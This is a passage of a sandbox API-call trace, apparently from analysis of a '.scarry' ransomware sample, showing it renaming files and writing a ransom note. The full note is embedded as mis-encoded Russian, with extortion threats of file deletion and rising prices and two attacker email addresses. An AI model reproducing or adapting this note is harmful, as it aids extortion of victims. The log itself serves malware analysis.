out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 46 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 
0xe [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.920] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.920] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0104.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9510, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.920] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.921] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.921] GlobalUnlock (hMem=0x45000c) returned 0 [0104.921] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.921] GlobalLock (hMem=0x450004) returned 0x593998 [0104.921] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.921] GlobalUnlock (hMem=0x45000c) returned 0 [0104.921] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.921] GlobalUnlock (hMem=0x450004) returned 0 [0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: 
lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0104.921] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 
[0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.922] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.922] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.923] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.923] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.923] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\", cchLength=0x38 | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\") returned 0x38 [0104.923] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0104.923] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0104.923] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.924] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.924] IMalloc:Free 
(This=0x767666bc, pv=0x578208) [0104.925] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.925] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.925] GlobalLock (hMem=0x450004) returned 0x591988 [0104.925] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.925] GlobalUnlock (hMem=0x450004) returned 0 [0104.925] GlobalLock (hMem=0x450004) returned 0x591988 [0104.925] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.925] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.925] GlobalUnlock (hMem=0x450004) returned 0 [0104.925] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.925] GlobalUnlock (hMem=0x45000c) returned 0 [0104.925] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, 
ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0104.925] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 1 [0104.925] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.926] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.926] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.926] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.926] GlobalUnlock (hMem=0x45000c) returned 0 [0104.926] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.926] GlobalLock (hMem=0x450004) returned 0x593998 [0104.926] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.926] GlobalUnlock (hMem=0x45000c) returned 0 [0104.926] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.926] GlobalUnlock (hMem=0x450004) returned 0 [0104.926] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.926] CharLowerBuffW (in: lpsz="EQNEDT32.CNT", cchLength=0xc | out: lpsz="eqnedt32.cnt") returned 0xc [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.926] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.927] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", cchWideChar=68, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNTñ", lpUsedDefaultChar=0x0) returned 68 [0104.927] CharLowerBuffW (in: lpsz=".CNT", cchLength=0x4 | out: lpsz=".cnt") returned 0x4 [0104.927] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".cnt", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cntShared\\EQUATION\\EQNEDT32.CNTñ", lpUsedDefaultChar=0x0) returned 4 [0104.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\я" (normalized: "c:\\program files\\common 
files\\microsoft shared\\equation\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.002] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d38*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d38*, lpNumberOfBytesWritten=0x18ed70*=0x1, lpOverlapped=0x0) returned 1 [0105.003] CloseHandle (hObject=0x1a4) returned 1 [0105.004] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\я")) returned 1 [0105.005] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d107e00, ftCreationTime.dwHighDateTime=0x1bb541c, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5d107e00, ftLastWriteTime.dwHighDateTime=0x1bb541c, nFileSizeHigh=0x0, nFileSizeLow=0x9fd, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.CNT", cAlternateFileName="")) returned 0x58b060 [0105.005] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0105.005] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0105.006] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0105.006] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", dwFileAttributes=0x20) returned 1 [0105.012] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.012] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.012] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x9fd [0105.013] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0105.013] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f28, nNumberOfBytesToRead=0x9fd, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f28*, lpNumberOfBytesRead=0x18ea34*=0x9fd, lpOverlapped=0x0) returned 1 [0105.060] GlobalLock (hMem=0x450004) returned 0x591988 [0105.060] GlobalLock (hMem=0x45000c) returned 0x593998 [0105.060] GlobalHandle (pMem=0x591988) returned 0x450004 [0105.060] GlobalUnlock (hMem=0x450004) returned 0 [0105.060] GlobalHandle (pMem=0x593998) returned 0x45000c [0105.060] GlobalUnlock (hMem=0x45000c) returned 0 [0105.060] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.060] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.060] GlobalUnlock (hMem=0x45000c) returned 0 [0105.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d998a8, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry") returned 39 [0105.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry" (normalized: "c:\\program files\\common files\\microsoft 
shared\\equation\\jbftmxnwtnn7aojxzayo12z6l3wt581+.scarry")) returned 1 [0105.176] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\jbftmxnwtnn7aojxzayo12z6l3wt581+.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.176] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0105.177] CloseHandle (hObject=0x1a4) returned 1 [0105.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\JbFtmXNWtNN7aOjxZaYO12Z6l3wT581+.scarry", dwFileAttributes=0x20) returned 1 [0105.177] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0105.177] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.177] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.177] GlobalUnlock (hMem=0x45000c) returned 0 [0105.178] GlobalLock (hMem=0x45000c) returned 0x591988 [0105.178] GlobalLock (hMem=0x450004) returned 0x593998 [0105.178] GlobalHandle (pMem=0x591988) returned 0x45000c [0105.178] GlobalUnlock (hMem=0x45000c) returned 0 [0105.178] GlobalHandle (pMem=0x593998) returned 0x450004 [0105.178] GlobalUnlock (hMem=0x450004) returned 0 [0105.178] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. 
\r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0105.178] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0105.178] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xc00008c8, dwReserved1=0x7ff, cFileName="鮀Ǫ\x18\x03", cAlternateFileName="")) returned 0xffffffff [0105.178] GetLastError () returned 0x2 [0105.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0105.179] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18ed24*=0xdf9, lpOverlapped=0x0) returned 1 [0105.180] CloseHandle (hObject=0x1a4) returned 1 [0105.182] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305200, ftCreationTime.dwHighDateTime=0x1c2f1c2, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x28305200, ftLastWriteTime.dwHighDateTime=0x1c2f1c2, nFileSizeHigh=0x0, nFileSizeLow=0x84a48, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQNEDT32.EXE", cAlternateFileName="")) returned 1 [0105.182] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0105.183] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, 
